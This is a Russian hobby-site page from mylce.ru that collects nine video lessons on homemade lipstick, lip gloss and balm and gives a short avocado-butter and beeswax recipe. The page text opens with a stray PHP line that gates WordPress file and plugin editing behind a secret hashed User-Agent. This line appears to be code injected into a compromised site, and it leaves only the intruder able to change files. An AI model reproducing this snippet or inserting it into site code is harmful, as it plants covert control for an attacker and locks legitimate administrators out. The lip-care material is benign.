if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 9 видеоуроков как сделать помаду, блеск и бальзам для губ в домашних услоиях | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

9 видеоуроков как сделать помаду, блеск и бальзам для губ в домашних услоиях

Для изготовления натуральной косметики своими руками нужно хорошо уметь рассчитывать пропорции, необходимые для получения нужного количества средства. Сегодня я подобрала 9 видеоуроков, как сделать помаду или блеск для губ

Для изго­тов­ле­ния нату­раль­ной кос­ме­ти­ки сво­и­ми рука­ми нуж­но хоро­шо уметь рас­счи­ты­вать про­пор­ции, необ­хо­ди­мые для полу­че­ния нуж­но­го коли­че­ства сред­ства. Сего­дня я подо­бра­ла 9 видео­уро­ков, как сде­лать пома­ду или блеск для губ.

А вот рецепт одно­го из них. В нашем слу­чае для созда­ния пома­ды-блес­ка в каче­стве осно­вы исполь­зо­ва­лось твер­дое и жид­кое мас­ло аво­ка­до, кото­рое про­сто неза­ме­ни­мо для губ зимой, когда чув­стви­тель­ный покров кожи неред­ко трес­ка­ет­ся и тре­бу­ет допол­ни­тель­но­го ухо­да, пита­ния и увлаж­не­ния. Необ­хо­ди­мым состав­ля­ю­щим эле­мен­том для любой пома­ды явля­ет­ся воск, не поз­во­ля­ю­щий пома­де ска­ты­вать­ся. Осо­бое вни­ма­ние сле­ду­ет обра­тить при добав­ле­нии кра­си­те­лей. Их пра­виль­ное соче­та­ние ста­нет допол­ни­тель­ным плю­сом само­дель­ной помады.

Все ингре­ди­ен­ты кос­ме­ти­че­ско­го сред­ства нуж­но поме­стить на водя­ную баню, после чего будет воз­мож­ность немно­го скор­рек­ти­ро­вать цвет и доба­вить жела­е­мый аро­мат, кап­нув неболь­шое коли­че­ство люби­мо­го эфир­но­го мас­ла. Оста­ет­ся лишь вылить рас­твор в под­хо­дя­щий фла­кон и дождать­ся застывания.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!